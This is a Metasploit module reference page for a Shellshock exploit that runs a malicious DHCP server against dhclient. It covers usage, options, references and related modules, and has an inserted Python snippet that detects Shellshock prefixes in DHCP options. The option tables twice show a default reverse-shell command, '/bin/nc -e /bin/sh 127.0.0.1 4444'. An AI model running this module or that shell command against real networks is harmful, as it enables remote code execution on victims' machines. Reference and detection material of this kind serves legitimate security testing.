DHCP Client Bash Environment Variable Code Injection (Shellshock) - Metasploit
This page contains detailed information about how to use the auxiliary/server/dhclient_bash_env Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: DHCP Client Bash Environment Variable Code Injection (Shellshock)
Module: auxiliary/server/dhclient_bash_env
Source code: modules/auxiliary/server/dhclient_bash_env.rb
Disclosure date: 2014-09-24
Last modification time: 2021-01-28 10:35:25 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-6271
This module is also known as Shellshock.
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution.
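A detection-side check for the DHCP fields named above, added here as an example and not part of the module or its documentation: it parses the option area of a DHCP reply and flags hostname, domain-name or URL options (codes 12, 15 and 114; the code-to-name mapping is assumed from the DHCP options registry) whose value opens with the Bash function-definition prefix that CVE-2014-6271 mis-parses. The sample option bytes are constructed inline, not captured traffic.

```python
import re

# DHCP option codes that dhclient exports to its hook scripts as environment
# variables; the module abuses exactly these fields (hostname, domain name,
# URL). Code-to-name mapping assumed from the DHCP options registry.
WATCHED_OPTIONS = {12: "host-name", 15: "domain-name", 114: "url"}

# Bash function-definition prefix that triggers CVE-2014-6271 when an exported
# variable begins with it; a DHCP string starting this way is suspect.
SHELLSHOCK_RE = re.compile(rb"^\s*\(\)\s*\{")

def parse_dhcp_options(options: bytes) -> dict:
    """Parse the TLV option area that follows the DHCP magic cookie."""
    opts = {}
    i = 0
    while i < len(options):
        code = options[i]
        if code == 0:          # pad option: single byte, no length field
            i += 1
            continue
        if code == 255:        # end option
            break
        if i + 1 >= len(options):
            raise ValueError("truncated option header")
        length = options[i + 1]
        value = options[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError(f"truncated option {code}")
        opts[code] = opts.get(code, b"") + value   # concatenate split options
        i += 2 + length
    return opts

def find_shellshock_options(options: bytes) -> list:
    """Names of watched options whose value carries the Shellshock prefix."""
    parsed = parse_dhcp_options(options)
    return [name for code, name in WATCHED_OPTIONS.items()
            if SHELLSHOCK_RE.match(parsed.get(code, b""))]

def build_option(code: int, value: bytes) -> bytes:
    return bytes([code, len(value)]) + value

# Constructed sample option areas (not captured traffic): a benign OFFER and one
# whose domain-name option carries a harmless Shellshock-style function prefix.
BENIGN = (build_option(53, b"\x02") + build_option(12, b"host1")
          + build_option(15, b"example.test") + b"\xff")
SUSPECT = (build_option(53, b"\x02")
           + build_option(15, b"() { :;}; echo shellshock-test") + b"\xff")

if __name__ == "__main__":
    print(find_shellshock_options(BENIGN))   # []
    print(find_shellshock_options(SUSPECT))  # ['domain-name']
```

The same check can be run over option bytes pulled from a packet capture to alert on rogue DHCP servers delivering this payload.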
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/dhclient_bash_env
msf auxiliary(dhclient_bash_env) > show targets
... a list of targets ...
msf auxiliary(dhclient_bash_env) > set TARGET target-id
msf auxiliary(dhclient_bash_env) > show options
... show and set options ...
msf auxiliary(dhclient_bash_env) > exploit
Required Options
- SRVHOST: The IP of the DHCP server
- NETMASK: The netmask of the local subnet
Msfconsole Usage
Here is how the server/dhclient_bash_env auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/dhclient_bash_env
msf6 auxiliary(server/dhclient_bash_env) > show info
Name: DHCP Client Bash Environment Variable Code Injection (Shellshock)
Module: auxiliary/server/dhclient_bash_env
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-09-24
Provided by:
scriptjunkie
apconole <apconole[at]yahoo.com>
Stephane Chazelas
Ramon de C Valle
Available actions:
Name Description
---- -----------
Service Run malicious DHCP server
Check supported:
No
Basic options:
Name         Current Setting                    Required  Description
----         ---------------                    --------  -----------
BROADCAST                                       no        The broadcast address to send to
CMD          /bin/nc -e /bin/sh 127.0.0.1 4444  yes       The command to run
DHCPIPEND                                       no        The last IP to give out
DHCPIPSTART                                     no        The first IP to give out
DNSSERVER                                       no        The DNS server IP address
FILENAME                                        no        The optional filename of a tftp boot server
HOSTSTART                                       no        The optional host integer counter
NETMASK                                         yes       The netmask of the local subnet
ROUTER                                          no        The router IP address
SRVHOST                                         yes       The IP of the DHCP server
Description:
This module exploits the Shellshock vulnerability, a flaw in how the
Bash shell handles external environment variables. This module
targets dhclient by responding to DHCP requests with a malicious
hostname, domainname, and URL which are then passed to the
configuration scripts as environment variables, resulting in code
execution.
References:
https://nvd.nist.gov/vuln/detail/CVE-2014-6271
https://cwe.mitre.org/data/definitions/94.html
OSVDB (112004)
https://www.exploit-db.com/exploits/34765
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
https://seclists.org/oss-sec/2014/q3/649
https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
Also known as:
Shellshock
Module Options
This is a complete list of options available in the server/dhclient_bash_env auxiliary module:
msf6 auxiliary(server/dhclient_bash_env) > show options
Module options (auxiliary/server/dhclient_bash_env):
Name         Current Setting                    Required  Description
----         ---------------                    --------  -----------
BROADCAST                                       no        The broadcast address to send to
CMD          /bin/nc -e /bin/sh 127.0.0.1 4444  yes       The command to run
DHCPIPEND                                       no        The last IP to give out
DHCPIPSTART                                     no        The first IP to give out
DNSSERVER                                       no        The DNS server IP address
FILENAME                                        no        The optional filename of a tftp boot server
HOSTSTART                                       no        The optional host integer counter
NETMASK                                         yes       The netmask of the local subnet
ROUTER                                          no        The router IP address
SRVHOST                                         yes       The IP of the DHCP server
Auxiliary action:
Name Description
---- -----------
Service Run malicious DHCP server
Advanced Options
Here is a complete list of advanced options supported by the server/dhclient_bash_env auxiliary module:
msf6 auxiliary(server/dhclient_bash_env) > show advanced
Module advanced options (auxiliary/server/dhclient_bash_env):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
VERBOSE    false            no        Enable detailed status messages
WORKSPACE                   no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/dhclient_bash_env module can do:
msf6 auxiliary(server/dhclient_bash_env) > show actions
Auxiliary actions:
Name Description
---- -----------
Service Run malicious DHCP server
Evasion Options
Here is the full list of evasion options supported by the server/dhclient_bash_env auxiliary module for evading defenses (e.g. antivirus, EDR, firewall, NIDS):
msf6 auxiliary(server/dhclient_bash_env) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Related Pull Requests
- #14696 Merged Pull Request: Zeitwerk rex folder
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #10649 Merged Pull Request: Fix http://seclists.org links to https://
- #10570 Merged Pull Request: AKA Metadata Refactor
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8629 Merged Pull Request: add 'Also known as', AKA 'AKA', to module references
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6298 Merged Pull Request: Update Shellshock modules, add Advantech coverage
- #3912 Merged Pull Request: Fix bad header error from pure Bash CGI script
- #3891 Merged Pull Request: Add dhclient_bash_env.rb (Bash exploit)
References
- CVE-2014-6271
- CWE-94
- OSVDB (112004)
- EDB-34765
- https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
- https://seclists.org/oss-sec/2014/q3/649
- https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
See Also
Check also the following modules related to this module:
- exploit/linux/http/advantech_switch_bash_env_exec
- auxiliary/scanner/http/apache_mod_cgi_bash_env
- exploit/multi/http/apache_mod_cgi_bash_env_exec
- exploit/unix/dhcp/bash_environment
- exploit/multi/http/cups_bash_env_exec
- exploit/linux/http/ipfire_bashbug_exec
- exploit/multi/ftp/pureftpd_bash_env_exec
- exploit/unix/smtp/qmail_bash_env_exec
- exploit/osx/local/vmware_bash_function_root
- auxiliary/scanner/printer/printer_env_vars
- post/multi/gather/env
- post/windows/gather/enum_powershell_env
- auxiliary/gather/alienvault_iso27001_sqli
- auxiliary/gather/alienvault_newpolicyform_sqli
- auxiliary/scanner/openvas/openvas_gsad_login
- auxiliary/scanner/openvas/openvas_omp_login
- auxiliary/scanner/openvas/openvas_otp_login
- auxiliary/scanner/sap/sap_mgmt_con_getenv
- encoder/x86/fnstenv_mov
- exploit/linux/http/alienvault_exec
- exploit/linux/http/alienvault_sqli_exec
- exploit/linux/ids/alienvault_centerd_soap_exec
- exploit/multi/misc/openview_omniback_exec
- exploit/unix/webapp/openview_connectednodes_exec
- exploit/windows/http/hp_nnm_openview5
- exploit/windows/http/hp_openview_insight_backdoor
- post/linux/gather/openvpn_credentials
- exploit/linux/local/bash_profile_persistence
- payload/cmd/unix/reverse_bash
- payload/cmd/unix/reverse_bash_telnet_ssl
- payload/cmd/unix/reverse_bash_udp
Related Nessus plugins:
- Solaris 10 (x86) : 126547-10 (deprecated)
- Solaris 10 (sparc) : 126546-10 (deprecated)
- Bash Remote Code Execution (Shellshock)
- Debian DSA-3032-1 : bash - security update
- RHEL 5 / 6 / 7 : bash (RHSA-2014:1293) (Shellshock)
- GNU Bash Environment Variable Handling Code Injection (Shellshock)
- Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-267-01) (Shellshock)
- CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)
- FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)
- Mandriva Linux Security Advisory : bash (MDVSA-2014:186)
Authors
- scriptjunkie
- apconole[at]yahoo.com
- Stephane Chazelas
- Ramon de C Valle
Version
This page has been produced using Metasploit Framework version 6.1.29-dev. For more modules, visit the Metasploit Module Library.